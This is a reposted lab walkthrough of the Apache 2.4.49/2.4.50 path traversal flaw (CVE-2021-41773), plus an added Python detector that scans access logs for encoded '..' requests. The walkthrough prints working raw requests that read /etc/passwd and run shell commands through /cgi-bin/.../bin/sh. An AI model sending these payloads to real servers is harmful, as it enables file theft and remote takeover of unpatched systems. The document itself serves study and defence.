
vulfocus - apache (cve_2021_41773)

2022-09-23 08:38:38 stealth rookie

Description

A path traversal vulnerability exists in the path normalization changes introduced in Apache HTTP Server 2.4.49 and 2.4.50. It allows attackers to read files outside the web document root, such as system configuration files and website source code, and under certain conditions an attacker can craft requests that execute commands and take control of the server.

Attackers can use a path traversal attack to map URLs to files outside the expected document root; if those files are not protected by the "require all denied" access control directive (disabled by default), such requests will succeed. In addition, the vulnerability can leak the source of interpreted files such as CGI scripts.

Reproduction

1. Start the vulfocus target environment

2. File read: use Burp to capture a request and send the following

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404;

3. RCE (command execution)

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1
Content-Length: 8

echo; id

4. The command above executes successfully; running ls /tmp then reveals the flag.
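The requests above work because the 2.4.49/2.4.50 normalization checked for ".." before percent-decoding, so ".%2e" and "%2e%2e" segments slipped through. The detector below is an added example (not part of the original post): it parses Apache combined-format access log lines, decodes the request path the way a safe normalizer should, and flags any request whose decoded path contains a ".." segment, marking separately the ones where the traversal only appears after decoding. The log lines are constructed for the example and reuse the two payloads shown in the write-up; the IPs, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Sep/2022:08:38:38 +0800] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1365 "-" "Mozilla/5.0"
10.0.0.5 - - [23/Sep/2022:08:39:02 +0800] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 54 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Sep/2022:08:40:10 +0800] "GET /icons/apache_pb.png HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Sep/2022:08:41:11 +0800] "GET /docs/../index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"
"""

# Fields of the combined log format that the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def decode_path(raw):
    """Percent-decode until the value stops changing, so double encoding
    (%252e) is unwrapped as well as the single-layer %2e used in the write-up."""
    prev, cur = None, raw
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def has_traversal(raw_path):
    """True if any path segment is '..' once every encoding layer is stripped.
    Decoding happens before the '..' check, which is the order 2.4.49 got wrong."""
    decoded = decode_path(raw_path.split("?", 1)[0])
    return any(seg == ".." for seg in decoded.split("/"))


def scan_log(text):
    """Return (ip, method, decoded_path, hidden) for each traversal request.
    hidden is True when '..' is absent from the raw path and only appears
    after decoding, i.e. the encoded form that bypassed the vulnerable check."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not has_traversal(m["path"]):
            continue
        hits.append((m["ip"], m["method"], decode_path(m["path"]), ".." not in m["path"]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A hit with hidden=True against an unpatched 2.4.49/2.4.50 server should be treated as a likely successful read or command execution, not just an attempt; the fix is to upgrade to 2.4.51 or later and keep "Require all denied" on the filesystem root.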


Copyright notice
This article was written by [stealth rookie]; please include the original link when reposting. Thank you.
https://chowdera.com/2022/266/202209230828454520.html
